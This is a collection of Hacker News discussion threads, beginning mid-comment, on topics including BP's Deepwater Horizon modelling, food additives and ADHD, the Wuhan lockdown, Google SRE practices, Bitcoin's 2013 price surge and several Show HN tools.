a "passive user" on your platform?
Many eu countries and Austalia have privacy laws around these basic rights.
------
irickt
Site: [http://springrole.com/](http://springrole.com/)
| {
"pile_set_name": "HackerNews"
} |
BP oil rig modelling software showed cement unstable days before blast - DMPenfold2008
http://www.computerworlduk.com/news/it-business/3248321/deepwater-horizon-modelling-software-showed-bp-cement-conditions-unstable/
======
jared314
I like the subtitle better: Oil giant decided data was unreliable and took
other steps.
Just remember this when the reverse happens, where the model is wrong and they
ignore all evidence to the contrary.
~~~
scott_s
But did they decide the data was unreliable because they didn't like the
conclusion, or because they had genuine reservations about the validity of the
model and/or data? And if they did, why check the model, anyway?
What worries me about the mentality of "I'm not confident in this data, but
let's check the model anyway" is that being irrational creatures, we're likely
to use a positive result from the model as evidence that everything is okay,
but ignore a negative result because the data is unreliable. That is,
different results, same conclusion. This is not logically valid, but we're
irrational creatures and it takes discipline to avoid the fallacy.
~~~
Retric
I assume they did not like the conclusion.
_The company conducted a separate negative pressure test...
The test was failed, but was – for an unexplained reason – deemed a “complete
success” by both BP and rig owner Transocean at the time, a presentation on
Monday said._
------
z92
It's rate of false positive that really matters. When that software says
something is wrong at magnitude-X and with a very low false positive rate that
thing is really wrong at that scale, then I shall agree it was BPs fault for
ignoring it.
| {
"pile_set_name": "HackerNews"
} |
What You Can Do with a 13-Year-Old Laptop - sT370ma2
https://cheapskatesguide.org/articles/what-a-thirteen-can-do.html
======
dddddaviddddd
Getting a quality battery is the biggest obstacle for me to use old hardware.
Otherwise would honestly consider using a PowerBook G3.
| {
"pile_set_name": "HackerNews"
} |
Research Shows ADHD Increased by Food Additives - charzom
http://www.nytimes.com/2007/09/06/health/research/06hyper.html?ex=1346731200&en=dbf718c298c91c04&ei=5090&partner=rssuserland&emc=rss
======
danteembermage
The trouble with these kinds of studies (and with empirical evidence in
general) is that there are often omitted correlating factors left out of the
analysis. Doctors would be sure to control diet and other medications,
economists would control socioeconomic status, sociologists would look for
cultural factors, etc. However, they're not going to do two or three of these
sets at once so the result is a biased study no matter who performs it.
In this case I think a good potential omitted factor is the level of parental
discipline. Suppose parents A are Dr. Spock laissez-faire with their kids.
This is most likely correlated with: Not sitting still for the family meal
Watching a lot of television Getting their way in public places So Junior gets
lots of TV dinners, quick snacks, and time with the power rangers so he wants
to do karate instead of read Fox in Socks
Parents B run a tight ship and consequently their vegan, free-range fed
wonder-child is happy to sit on the magic carpet and hear about anything so
long as it's not The Wealth of Nations again.
Applying the overused correlation != causation mantra is a bit cheap, to be
fair we must follow the immediate next step, "If correlation != causation,
why?" I think here we have plenty of compelling falsifiable narratives to try
before we make green key-lime pie illegal.
~~~
greendestiny
Well its a shame you didn't read the article, they conducted a placebo
controlled study where they randomly introduced these additives into the
children's diets. There really should be no systemic effect from self-
selection, apart from in the recruitment process (which they don't discuss).
------
iamwil
I remember NPR doing a story on this. Their conclusion was that the headline's
a little misleading. It should say SOME food additives may cause ADHD behavior
in SOME children.
I guess the affect is small and affects those predisposed.
------
kingkongrevenge
This is much less surprising than the research on Omega 3 fatty acids and
hyperactivity.
Researchers found that supplementing problem kids with fish oil had dramatic
effects. Youth offenders showed something like a 40% drop in recidivism vs the
control. Low grade-level readers mostly rose to grade level within months.
The implication of this is that lousy food is causing criminality and
stupidity. The UK government concluded from this research that it would be
very cost effective to provide fish oil supplements to school children.
But here's the scary bit: there aren't enough fish in the world. Once they ran
the numbers they found it would be impossible.
------
curi
_Common food additives and colorings can increase hyperactive behavior in a
broad range of children, a study being released today found.
It was the first time researchers conclusively and scientifically confirmed a
link that had long been suspected by many parents. Numerous support groups for
attention deficit hyperactivity disorder have for years recommended removing
such ingredients from diets, although experts have continued to debate the
evidence._
So, the parents and support groups "knew" the answer _before_ there was
scientific evidence supporting their claims.
So, they didn't know, they just have an unscientific agenda.
Now the article acts like their position was validated. It was not. It's
scientific status hasn't changed whether science happens to reach the same
conclusion or not. They are irrational either way.
------
curi
_In response to the study, the Food Standards Agency advised parents to
monitor their children's activity and, if they noted a marked change with food
containing additives, to adjust their diets accordingly, eliminating
artificial colors and preservatives._
That's stupid too. Parents aren't going to monitor children's behavior
_scientifically_. They aren't going to record it carefully and objectively and
compare it to control data previously recorded. This advice will simply lead
them to act on whims and fancies.
| {
"pile_set_name": "HackerNews"
} |
ElasticInbox – Open Source Distributed Email Store - zheng
http://www.elasticinbox.com/
======
Icer5k
Interesting concept, especially with the recent changes Google has made to
GMail/Apps. The biggest benefit/downside that jumps out at me is the
complexity required to run an email system this way - Cassandra clusters,
LDAP, external MTAs, and web severs all need to be managed. Obviously every
email system requires these components to run, but most full-blown systems
handle the relationships between components on their own.
TL;DR - Looks great for large businesses or maybe as a platform for a startup,
but not as a hobbyist project.
~~~
Down_n_Out
I was thinking the exact same thing, I'd love to test it out, but for the
moment (it might change in the future, I'm being hopeful) it's a tad too
complex to setup for even a test ... I will keep an eye on the project though!
------
jello4pres
This looks really cool. Have you gotten anybody using it already, and what's
the feedback been like so far?
------
zheng
This really does appeal to me, but I wish it didn't rely on Cassandra. That's
a heavy dependency if you would otherwise have no java in your stack which
many mail servers probably wouldn't. It's certainly an interesting departure
from flat files or standard databases though.
~~~
wheaties
Fork it. I'm planning on doing just that.
------
ibotty
hmm. email is one of the things that scales extremely good (see dovecot's
directors for a sophisticated but simple way). i don't know why you will need
such a big hammer.
~~~
mvip
Well yes, but they usually rely on traditional storage methods (on disk or via
something like NFS shares). Normally they use sharding based on the mailbox
name and spread it across multiple storage backends.
The only mailserver before this that stepped away from this methodology as far
as I can remember was DBMail, but it suffered from many other issues instead.
Using Blob-store like S3 (with some kind of encryption) combined with a db
with metadata makes a lot of sense to me for this application. Alternatively,
storing it all in something like MongoDB's ReplicaSet would also be
interesting.
Now, if ElasticInbox is the best tool for this is a separate discussion, but
this type of architecture sure is compelling.
~~~
zheng
I'd agree with your comment about the architecture being compelling. Do you
know of any alternatives that are designed with scalability in mind?
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Why is it hard to get a job in California? - ryanlm
If you're from a different state, how hard is it to find Software Engineering work in another state? I'm finishing undergrad from a State School in December.
======
jpeg_hero
its 100x easier if you are local.
sublet a place in sf for 3 months, odds are you'll find a gig.
in order for companies to call an out of state fresh grad staying at home, you
really need to stand out (great gpa, "hard programming" personal projects)
~~~
ryanlm
I have "hard programming" personal projects. All my projects are in low level
C. I have a data structure library, (think C++ stl). I also have a programming
language I built in C with an AST, and function calls, variables, all that.
~~~
jpeg_hero
Yeah, that's the type of stuff you'd need to stand out.
Its still harder to stay home, but if you are, here are a few tips: leave your
address off your cv. Recruiters will still see the location of your undergrad
but hopefully you'll get a phone interview (and pass it) and when they ask you
where you are located, tell them, but then also say something along the lines
of "I am moving to sf January 15th" something like that.
Bigcos will play more ball than start ups.
| {
"pile_set_name": "HackerNews"
} |
What is Your favorite free/open license to work with? - afiori
======
jrepinc
GPL →
[https://www.gnu.org/licenses/gpl-3.0.html](https://www.gnu.org/licenses/gpl-3.0.html)
Because it provides the highest ensurance/protection that others that get my
software will have the same freedoms I had when I got the GPL-ed software and
noone can take these freedoms away.
| {
"pile_set_name": "HackerNews"
} |
Gov't, certificate authorities conspire to spy on SSL users? - kmod
http://arstechnica.com/security/news/2010/03/govts-certificate-authorities-conspire-to-spy-on-ssl-users.ars#
======
CWuestefeld
This story is interesting in the context of recent discussions about
WikiLeaks. They'd seem a prime target for eavesdropping.
| {
"pile_set_name": "HackerNews"
} |
Measuring - mnemonik
http://dilbert.com/blog/entry/measuring/
======
davi
If anyone doesn't know, wattvision is a YC startup.
<http://news.ycombinator.com/item?id=832216>
------
raheemm
_I think that government in particular needs to provide a web-based dashboard
of stats to its citizens so we can see how the country is doing._
This is a great idea and should be easy to implement. A lot of data is already
collected by the gov. Perhaps the gov 2.0 project might make this one step
closer to reality.
~~~
kingkongreveng_
The stats the government already provides are baked to hell, and manipulated
to suit the political cycle. It's a stupid idea.
The government shouldn't even be in the measurement and statistics business.
We need a census and that's about it. Why should the government calculate GDP
and so on? Competing private estimations provide greater depth already.
| {
"pile_set_name": "HackerNews"
} |
Wuhan scientists: What it’s like to be on lockdown - bookofjoe
https://www.nature.com/articles/d41586-020-00191-5
======
xgantan
As a Canadian, I'm currently visiting my family in Changsha, a city about 4
hours of a drive south of Wuhan. In the city, everyone is on edge. All public
places such as restaurants, gyms and night clubs are closed. And everyone on
the street wears a surgical or N95 mask. Not only Wuhan, but the entire
country is also on lockdown.
It sucks but the people and the government have aligned themselves together to
do whatever it takes to contain and control the coronavirus. Let's be strong
and have faith.
------
ycombonator
Approximately 58 million in lockdown, this is apocalyptic.
From South China Morning Post. Chaos in hospitals:
[https://www.youtube.com/watch?time_continue=22&v=CfcIHUdOI8w...](https://www.youtube.com/watch?time_continue=22&v=CfcIHUdOI8w&feature=emb_title)
[https://www.zerohedge.com/political/56-million-chinese-
lockd...](https://www.zerohedge.com/political/56-million-chinese-lockdown-
virus-spreads-australia-malaysia)
~~~
dgellow
In case people don't want to click on a zerohedge article, here is the actual
source for the claim "China expands coronavirus outbreak lockdown to 56
million people", from Aljazeera:
[https://www.aljazeera.com/news/2020/01/china-expands-
coronav...](https://www.aljazeera.com/news/2020/01/china-expands-coronavirus-
outbreak-lockdown-fast-tracks-hospital-200124201635848.html)
~~~
ropiwqefjnpoa
I find ZeroHedge usually has links to the source articles and they are often
"mainstream".
~~~
SolaceQuantum
I don't mind that ZeroHedge as it often cites news that isn't picked up on
MSM. However, I have a massive concern about the bias in ZeroHedge. I remember
once reading an article in which the final lines are something bold and along
the lines of "remember they hate you and are coming for you" type rhetoric.
That was completely not cited. I find that extremely concerning.
Also, similarly, they at one point ran an article about a John Hopkins doctor
who is against gender affirmation treatment towards trans people. I googled
more about their papers and the like, only to find that the doctor only
published their work in religious-oriented research and has actually be
disavowed by several medical practitioners who specialize in trans medical
concerns. None of this was cited in the article.
This has overall made me quite leery of the validity of ZeroHedge on anything
but the links that ZeroHedge cites.
~~~
cdiddy2
Generally with zerohedge I mostly stick to the financial stuff, since that is
usually properly sourced, even if the site does have a bearish bias its still
usually good info. There are definitely some heavily biased political articles
though.
------
Merrill
The restrictions on travel in China will be an interesting experiment in how
much interurban travel is essential.
My take would be that with modern communications and IT infrastructure, there
is actually very little need for interurban travel not associated with the
movement of physical goods, i.e. not associated with truck drivers, rail
crews, barge crews, air freight pilots, and so forth. Most other travel can be
replaced by communications.
~~~
dougb5
While much business travel may be inessential, family visits for Lunar New
Year are surely essential for many people, so this is a tough time for such an
experiment. I was surprised to learn that there are normally 3 billion
passenger-journeys in China during the Lunar New Year period!
([https://en.wikipedia.org/wiki/Chunyun](https://en.wikipedia.org/wiki/Chunyun)).
------
ggm
If you want less hyperbolic information i recommend
[https://promedmail.org/](https://promedmail.org/)
------
FooBarWidget
I have read that Wuhan hospitals are accepting supplies donations. Anyone
knows what supplies they need, how to buy them and how to donate?
~~~
fspeech
Here is the official channel:
[http://www.hubei.gov.cn/zhuanti/2020/gzxxgzbd/zxtb/202001/t2...](http://www.hubei.gov.cn/zhuanti/2020/gzxxgzbd/zxtb/202001/t20200126_2015047.shtml)
There are other calls for help directly from hospitals. Some private hospitals
may be in particularly bad shape. However shipping could be an issue if one
doesn't want to use official channels. The government page does say that you
could designate donees 定向捐赠.
~~~
jannes
Even though I don't understand a single word on that page, I immediately
recognised that they are using Bootstrap.
For whatever reason I didn't expect them to use a western design tool. It's
interesting how far Bootstrap is spreading into all corners of the world.
------
egberts1
I am old enough to remember the SARS breakout that began in Wuhan in 2004.
It’s happening again!
~~~
rfoo
You mean old enough to mis-remember the SARS breakout?
It began in Guangdong in late 2002.
------
nickgrosvenor
I actually think China’s done an admirable job containing this virus. I think
what they’ve done will probably work to stop the spread.
The most interesting part of this whole episode is the Orwellian efficiency
communist China can control their population at will.
~~~
fsh
Pretty much any country has some form of martial law. For example, the US very
quickly shut down one of their largest cities and all air travel in the
country on 9/11.
~~~
closeparen
The FAA already had discretionary authority over US airspace. Saying “no” to
everything all at once was unusual, but didn’t exercise any new power. Martial
law is more like “sudo” for the executive branch, letting it do what would not
otherwise be legal.
------
ycombonator
[https://www.inkstonenews.com/health/chinas-coronavirus-
outbr...](https://www.inkstonenews.com/health/chinas-coronavirus-outbreak-may-
be-linked-penchant-people-eat-wildlife/article/3047304)
------
draugadrotten
Dr. Eric Feigl-Ding (Harvard): " HOLY MOTHER OF GOD - the new coronavirus is a
3.8!!! How bad is that reproductive R0 value? It is thermonuclear pandemic
level bad - never seen an actual virality coefficient outside of Twitter in my
entire career. I’m not exaggerating..."
[https://threadreaderapp.com/thread/1220919589623803905.html](https://threadreaderapp.com/thread/1220919589623803905.html)
~~~
tempsy
Obscene level of fear mongering based on data that was later revised down. I
can’t believe he thought that thread was a good idea.
~~~
dilly_li
Where is the updated version?
~~~
dtolnay
Revised down to 2.6:
[https://threadreaderapp.com/thread/1221132573340061697.html](https://threadreaderapp.com/thread/1221132573340061697.html)
~~~
myth_drannon
Still very high.
~~~
akiselev
No, it's middling at best. Measles in a totally unvaccinated population (R0 =
12-18) is very high [1]. An R0 of 2.6 is a relative cakewalk.
[1]
[https://en.wikipedia.org/wiki/Basic_reproduction_number](https://en.wikipedia.org/wiki/Basic_reproduction_number)
| {
"pile_set_name": "HackerNews"
} |
Show HN: Vimalin - Backup VMware Fusion VMs, even when they are still running - wila
https://www.vimalin.com/show-case/backup-your-vmware-fusion-vms-even-when-they-are-still-running/
======
somvie
Looks cool, but I do not own a mac.
Have you thought about building this for VMware Workstation?
~~~
wila
Hi, thanks for the question.
This is the most common question I get whenever I introduce Vimalin. "Where's
the Windows version?"
It is not there yet, but this is something that I am actively working on and
hope to have ready for a beta soon.
| {
"pile_set_name": "HackerNews"
} |
Show HN: I made a minimalist tool to automate approval workflow via Google Forms - TommyL128
https://performflow.com/
======
TommyL128
Hey, creator here. I'm used to be a developer and now I have a small store in
Shopify. Doing ecommerce is fun, yet managing purchasing workflow was
frustrating.
I had searched the solution and there was a tool named Kissflow that could
help me but it was costly and for bigger team. That's why I decided to build a
minimalist tool myself and I chosed Apps Script, a free script from Google to
build a Google Forms addon. (Google Forms is simple & easy-to-use and I always
have entrepreneurial mindset so I planned to upload to Gsuite Marketplace to
have external users too)
Then, Firebase is for database due to its realtime feature, low cost, and
generous free quota. Also, I used Google Cloud Functions to handle small tasks
(backup, utilities,...) and things that Apps Script can't do.
The final result is PerformFlow, an add-on that can automate approval workflow
via Google Forms. It was uploaded to Gsuite Marketplace and till now, it has
some users. Thanks to the good response from users, I updated a new feature to
generate & send PDF based on the feedbacks.
It's just a simple tool that utilizes Google Forms so I'd love to have your
comment & ask me if there is any question!
~~~
WhiteOwlLion
I was looking at HelloSign too. I volunteer with a non-profit that has forms
for adopting orphans abroad. The amount of paperwork is insane. Being able to
leverage same data points (date, name, address, etc) and apply it to multiple
forms is a good idea. HR would benefit too. New hire paper work. In 2019,
you'd think this would be all online and digital, but there's still paper
involved for regulatory/legal reasons or because the old dinosaurs will not
retire yet.
| {
"pile_set_name": "HackerNews"
} |
Show HN: Perfect Postcards - $2 to the US, $3 to everywhere else - thebiglebrewski
https://www.postperfect.co
======
mstolpm
I don't understand the problem you're trying to solve: The site doesn't tell
me what it is about, why I should bother and who is behind it. Moreover, the
selection of postcards is very limited and not what I would expect to be the
"perfect postcard".
~~~
thebiglebrewski
The problem I'm trying to solve: normally, when you're in another city it's
hard to purchase, write out, buy postage for, and then identify the correct
mailbox for a postcard.
It's also just meant to provide a really simple and easy way to send a
postcard to someone. Some of the cards are holiday cards and others are
greetings from where I'm based here in NYC.
What kind of postcards would you like to see on the site? I purchased the
rights for each card so that's why the selection might be construed as a bit
limited.
Thanks for your feedback!
------
thebiglebrewski
Would love some feedback on this! Thanks anybody for commenting =)
| {
"pile_set_name": "HackerNews"
} |
The differing definitions of “serverless” - fagnerbrack
https://winterwindsoftware.com/serverless-definitions/
======
sbinthree
Certainly our AWS bill when we were using Lambda + API Gateway forced us to
"think about servers" and why we were paying 10x more for slower responding
application server to spin up for 15 minutes to process a request that
requires 50mb of RAM / 10 ms and subsequently billing us for the full
allocated amount at 100 ms. Learn from our pain: use EC2.
~~~
snazz
How much traffic were you receiving when it made financial sense to switch
from serverless to EC2?
~~~
sbinthree
I mean we only tolerated those bills for a few months before we had to switch,
but generally speaking we were handling on the order of 4-5M requests/day,
mostly low bandwidth. API Gateway, and wasting lots of allocated server
resources for each time the function ran, was just killing us. The load was
pretty constant, which was another reason to switch. No regrets either way,
but we should have done the billing math at production load and not just been
blinded by the free tier and the low cost per run.
| {
"pile_set_name": "HackerNews"
} |
Ask HN: Proxy JavaScript APIs through nginx? - antihero
Hello, I have an issue with my site in that I need to be able to maintain anonymity for users. I also use 3rd party APIs such as the Google Maps API - this means that a user's browser directly communicates with Google for map queries.<p>Simply put, is there a way I can use nginx (or Flask/WSGI) to "proxy" the request, so that the script points to my server, then my server gets the 3rd party script, then passes the results back to the client (thus removing the direct interaction with Google's servers)?<p>Thanks
======
hoodoof
You might consider stackoverflow.com or superuser.com for technically oriented
Q&A like this.
| {
"pile_set_name": "HackerNews"
} |
BTC $141 USD - niggler
https://mtgox.com/#
======
AndrewDucker
How are people still actually using it to _buy_ things?
My problem with this rate of change is that it makes it harder to use it as a
means of buying things.
If I see an item for sale for 2.5BTC then it can take me an hour to translate
my GBP into BTC. Then I carry out the exchange, and then they have to transfer
it back to their currency (if they want to spend it on most things).
If the value has gone up 15% in that time then what price should they be
charging me?
Should a shopfront be updating its prices on an hourly basis?
I'm all for BTC being valuable, but it needs to have _some_ stability to be
used as a method of value exchange.
~~~
swinglock
I bought a domain at Namecheap. That sent me over to BitPay which I gave the
current USD price in BitCoins and an hour later Namecheap had accepted the
payment.
~~~
Devilboy
And two days later you regretted not hoarding the bitcoin instead.
~~~
swinglock
I don't, the price was good and the amount was tiny. Sure it would have been
better today but I needed it yesterday.
That wasn't the point though, the point is yes, you can buy stuff and it's
simple. Apart from the hour it takes to confirm the transaction (this is done
by the BitCoin network, nothing any user or particular party needs to do) it
was much less of a hassle than paying with a credit card... at least if you
already have the BitCoins.
------
russellallen
A currency which changes in value by around 40% in a 24 hour period is
completely useless for the transactions I mostly deal with. We worry about a
few percent change over weeks and insist on hedges.
Imagine saying to someone - I'll put 1000 BTC into your venture when you reach
the next milestone in two months. What's that going to be? USD 100,000? USD
50,000? USD 1.50?
~~~
niggler
"A currency which changes in value by around 40% in a 24 hour period is
completely useless for the transactions I mostly deal with"
1\. IIRC Silk road uses some average price rather than the spot price
2\. Does anyone provide BTC hedging? Seems like a pretty useful and profitable
service.
~~~
ragmondo
To enable hedging, someone would have to take a forward position in USD/BTC ..
and at the moment, the market is in contango ( see
<http://en.wikipedia.org/wiki/Contango> ) which means that the sentiment is
that the price will continue to increase for the near term ... ie you'd have
to be very brave indeed in order to put a limit on the expected BTC price.
~~~
niggler
"you'd have to be very brave indeed in order to put a limit on the expected
BTC price."
Or quote a fairly aggressive price (so that the hedger pays a significant
premium for the service)
Also, how are you getting futures/forward prices on USDBTC?
------
bryanlarsen
Standard bubble advice applies here.
1) the market can stay irrational longer than you can stay solvent. (Keynes)
2) a bird in the hand is worth two in the bush. Bank your profits. It turns
exponential gains into linear gains, throwing away a huge amount of potential
profits. But a small amount of real profit is worth more than a huge amount of
potential profit.
~~~
codesuela
Just sold my BTC for about 75% profit within a few weeks, still probably gonna
bite myself in the ass if Bitcoin ever hits 1000 USD
~~~
jaimebuelta
75% profit within few weeks seems EXTREMELY good to me. I can't really see the
problem (yes, I know for a emotional point of view. Just think about 75% in a
few weeks)
------
Nursie
But it's still not a bubble, no sir, the bitcoin economy has just really
kicked in to the tune of 40% growth in the last 24 hours...
------
pazimzadeh
The latest price is always here:
<http://bitcoinity.org/markets>.
I'm not sure that a new submission is required every day.
~~~
rplnt
I'm sure they are not required and they are annoying even. Especially when the
submission adds absolutely nothing. And as a bonus links to a page that is not
valid few minutes after posting.
------
daveungerer
I'm surprised that someone hasn't started another Bitcoin yet. Is it harder
than just changing some initial seed? Because the artificial scarcity of
digital currency is what's allowing for these high prices.
Then all you need is intermediary parties that will exchange your V2 Bitcoins
for V1 Bitcoins (which will currently have the highest acceptance for buying
things). Over time, V2, V3 etc. may even become accepted directly by
merchants, if they become big enough.
UPDATE: Thanks for the info on additional ones. This is getting really
interesting. So my initial scarcity hypothesis was wrong, which means it's
just pure herd mentality. Hopefully over time the availability of multiple
currencies will lead to some sort of equilibrium though.
~~~
rheide
Litecoin. Namecoin. Ixcoin. Ppcoin. Terracoin. Devcoin.
------
mkr-hn
That's a lot of tulips.
------
bluedevil2k
_cough_ sell now _cough_
~~~
rheide
Yet people aren't. Apparently there's still enough belief to warrant this kind
of growth.
(..getting ready to eat my own words, real soon..)
------
freakyterrorist
Surely this madness has to end soon?
Also seriously regretting not buying it when it was "expensive" at <$5 :(
~~~
nkozyra
Some of us bought ours around $.85 and sold when there was _no way_ it could
go any higher around $30.
~~~
niggler
"Some of us bought ours around $.85 and sold when there was no way it could go
any higher around $30."
Picking tops and bottoms is a fool's game.
------
crazytony
Not being fluent in the ins and outs of bitcoin: what is driving this? Is it
pure speculation? Are more people trying to get in on the BTC wagon (riding
the Cyprus wave)?
~~~
Nursie
Speculation.
There doesn't seem to be any evidence that (in the world of BTC) the Cyprus
situation has triggered anything other than rampant speculation by non-cypriot
libertarians who already distrust central banks and now have a boogeyman to
point at.
------
meerita
It makes impossible for a developer to charge BT on any service. Tell me how
you do it without being overpriced the next day.
~~~
EarthLaunch
Calculate the exchange rate automatically? This is not 1900.
~~~
meerita
Really? I wasn't my point. I was talking about make use of the bitcoin value
as a statement. Of course I can charge in Yens and convert it on the fly to
dollars or pounds, but that wasn't the point.
It's really to make Btc popular on a website when every refresh can bring you
a new value. It's horrible for business. Btc right now is only useful for
trade than for other low end business operations as paying one month of
hosting or buying a toy.
------
polshaw
I cannot ----ing believe it. I thought there would be a bump when it hit $100,
but not this much. It's just insane, I was calling it a bubble since $30, and
it's doubled again and again..
I wonder how low the crash will go? I'm guessing it won't be below $30.
~~~
Nursie
Depends how many people get badly burned by this I would have thought. It
could pretty easily drop to almost nothing if confidence is completely bust,
as the 'fundamentals' supporting the price of BTC are far from obvious.
------
Matsta
My 2¢ is that it's gonna crash like it did a couple years back. Then would be
the best time to buy, since it will probably do this crazy business once
again.
~~~
paulhodge
Of course, it's not going to crash very far if enough people are thinking
this.
------
kmfrk
I guess the y-axis should be logarithmic at his point.
------
Yuioup
I still don't understand how a nonexistent coin could be worth anything. No
really. How does solving an algorithm translate into value?
~~~
niggler
Value, be it in gold or silver or USD or EUR or bitcoin or cars or art, is a
perceived phenomenon. Something has value because others are willing to trade
it for goods and services (or for other forms of value). Gold and silver are
trusted stores of value because they have been used in that capacity for
centuries (and for a very long time, USD were silver certificates so there was
real metal backing the paper)
The underlying value of BTC, IMO, is the anonymity feature (the ability to
conduct commerce without a clear centralized record identifying you by name).
Once that is compromised, it's not clear what value BTC will have.
~~~
ragmondo
Anonymity is not really the selling feature of bitcoin - in fact it really
only offers pseudo-anonymity.
The fact that no-one else can just "print" bitcoins, and that you can transfer
funds at internet speed to anybody else anywhere in the world and that (after
a short time), the transaction cannot be reversed are the main utilities.
~~~
jaimebuelta
Yes, I think it is possible, in the long run, to figure out who's behind a
wallet, assuming that the Bitcoin use is frequent and convenient (meaning no-
super-high-inconvenient-counter-measures are used, but a regular use of
currency)
In that case, my concern is that I think it will be possible to determine ALL
the transactions of that wallet. Making it even less anonymous than regular
currencies.
I could be missing something, but if confirmed, that could be a problem for
using Bitcoin as a regular currency
~~~
Nursie
There are various laundering schemes, and there's nothing stopping you using
new wallets constantly.
But yes, in effect, every transaction is traceable and public, AFAICT.
~~~
jaimebuelta
Yes, I understand that there are things that you can do. But, as those are in
the way of convenience, we can assume that not everyone will take the extra
effort to create constantly new wallets, etc.
So, in case someone can trace you to a wallet, that someone can know all your
transactions (of course, only the transactions for that wallet), which is a
huge potential privacy risk.
------
nsns
It's like in Germany in the 30's.
~~~
glennos
I was thinking that as well, but it's actually the opposite. Germany
experienced hyperinflation, where the value of the Mark decreased rapidly.
This is the currency increasing in value, so "hyperdeflation" I guess.
| {
"pile_set_name": "HackerNews"
} |
Lessons from a Google App Engine SRE on how to serve over 100B requests per day - rey12rey
https://cloudplatform.googleblog.com/2016/04/lessons-from-a-Google-App-Engine-SRE-on-how-to-serve-over-100-billion-requests-per-day.html
======
dekhn
I used to be a scientist and I went to work at Google to apply their
technology to science problems. My first team was SRE- and I have to say,
Google's SRE approach to computing completely changed how I thought about
things, and more importantly, how I programmed systems that went to
production. I've read the SRE book and can highly recommend learning from the
principles it lays out.
~~~
kiloreux
Can you please give reference to that book ?
~~~
dekhn
It's the one mentioned in the interview, [http://www.amazon.com/Site-
Reliability-Engineering-Productio...](http://www.amazon.com/Site-Reliability-
Engineering-Production-Systems-ebook/dp/B01DCPXKZ6)
------
mikecb
The book they mention[1] is very good so far.
[1][https://play.google.com/store/books/details/Betsy_Beyer_Site...](https://play.google.com/store/books/details/Betsy_Beyer_Site_Reliability_Engineering?id=tYrPCwAAQBAJ)
~~~
thedevil
Upvoting because this link is cheaper than the Amazon link.
~~~
pkaye
If you are willing to wait, many times of the year O'Reilly will have their
ebooks on sale for 50%-60% off. The best time is black friday.
------
i336_
> Advance preparation, combined with extensive testing and contingency plans,
> meant that we were ready when things went [slightly wrong] and were able to
> minimize the impact on customers.
Following that link provided some interesting reading (for a mundane error
report, at least): [https://groups.google.com/forum/#!msg/google-appengine-
downt...](https://groups.google.com/forum/#!msg/google-appengine-downtime-
notify/T_e7lVg7QNY/lifcqZBcracJ)
TIL that even Google have datacenter fluctuations they can't figure out. It's
nice that they quietly make this info publicly available, and also nice that
I've now discovered where to find it :)
~~~
desarun
I love their solution.
They turned it off, then on again
------
bobp127001
I've been seeing a lot of references to SRE recently. Is Google trying to
market this position and acquire more engineers?
The SRE book, and Google in general, have mentioned that SREs are notoriously
hard to hire, and I'm wondering if they are doing a marketing push.
~~~
thrownaway2424
SREs are very hard to hire, speaking from experience. At Google SRE directors
and VPs will often cherry-pick promising candidates from the mainline SWE
hiring pipeline and give them a "hero call" to convert them to SREs. SREs at
Google are also paid more, controlling for level and performance, as a way to
hire and retain.
~~~
Reedx
Interesting. Can you expand on "hero call"? What does that entail?
~~~
agentultra
Donning a cape and meeting destiny.
In all seriousness they make it out to be more than it is. From my experience
going through their hiring pipeline there seem to be two tracks in SRE;
software and sysadmin. If you score higher in algorithms and data-structures,
presumably, you'll end up working more on tools and libraries whereas in the
other you'll work more on infrastructure and automation. Either way both
tracks work together on the same team towards the same goals.
If you want in be prepared to solve simple-to-tough algorithms problems and be
quizzed on TCP re-transmission, Linux system calls, and memory pressure. It's
a bit challenging because you not only have to know Big-O well enough to
estimate the asymptotic complexity of an arbitrary algorithm but you might
also be asked what a sequence of TCP packets would look like if you sent some
data and pulled the plug or what the parameters are to a given system call on
Linux. You quite literally have to know everything from how virtual memory
works, how to implement a fast k-means, how the network stack works from top
to bottom, etc, etc.
If you've done any work in cloud development and supporting moderately large
one it's that but bigger. Make one a hero, it does not.
------
nunez
I'm actually really really glad that Google released this book because I think
they are one of the few companies that is actually doing this SRE thing right.
I think the hardest bit about the SRE paradigm (like DevOps) is having
companies wholly adopt it, and I think that this book being out will help
change that.
------
tdmule
This got me wondering what the AWS services' work load per day was. Best
numbers I could find were from this 2013 article about serving ≈95 billion
requests per day for just S3. The size and scope of cloud providers is truly
cool and fascinating engineering.
[https://aws.amazon.com/blogs/aws/amazon-s3-two-trillion-
obje...](https://aws.amazon.com/blogs/aws/amazon-s3-two-trillion-
objects-11-million-requests-second/)
------
mtgx
I don't know why this isn't on HN, but this is another interesting post from
the Google Cloud Platform blog from today:
[https://cloudplatform.googleblog.com/2016/04/Google-and-
Rack...](https://cloudplatform.googleblog.com/2016/04/Google-and-Rackspace-co-
develop-open-server-architecture-based-on-new-IBM-POWER9-hardware.html)
~~~
rey12rey
It is ->
[https://news.ycombinator.com/item?id=11440179](https://news.ycombinator.com/item?id=11440179)
------
ec109685
s/lessons/lesson/
"If you put a human on a process that’s boring and repetitive, you’ll notice
errors creeping up. Computers’ response times to failures are also much faster
than ours. In the time it takes us to notice the error the computer has
already moved the traffic to another data center, keeping the service up and
running. It’s better to have people do things people are good at and computers
do things computers are good at."
------
yelnatz
1,157,407 requests per second.
~~~
iLoch
One Node.js server can do 10x that! /s
------
thirdreplicator
Only 100 bytes? That's easy... Sheesh.
| {
"pile_set_name": "HackerNews"
} |
Send email without any SMTP - NicolasRz_
Hello all.<p>A few weeks ago, I was building two showcase sites.<p>The first with wordpress and the second without (just html/css/js on netlify)<p>And like everytime, my customers wanted a contact form.<p>For the website on netlify, I was like, damn I need to get a server and configure a smtp only to send email to my customer from his website....<p>For the wordpress website, I have used ContactForm7 and EasySmtp to achieve this.
But I needed gmail email/password from my customer ... Explaining why I needed these information...
Everytime it's complicate and/or boring<p>And I thought, really ? there are not easier thant all of that ?<p>No.<p>So I decided to build a NoSmtp.<p>A wordpress plugin that send email without any configuration.
Of course, I need at least email of my client, to send email to him and the website address.
Ok it's now built and workind on production.<p>Ok I solved the wordpress problem.<p>Next.<p>My NoSmtp can work with a simple ajax call. But I wanted something else, something that need no code, that anyone could use.
So I built a Chrome Extension, where you can click on your inputs form (email/subject/ body something like that).
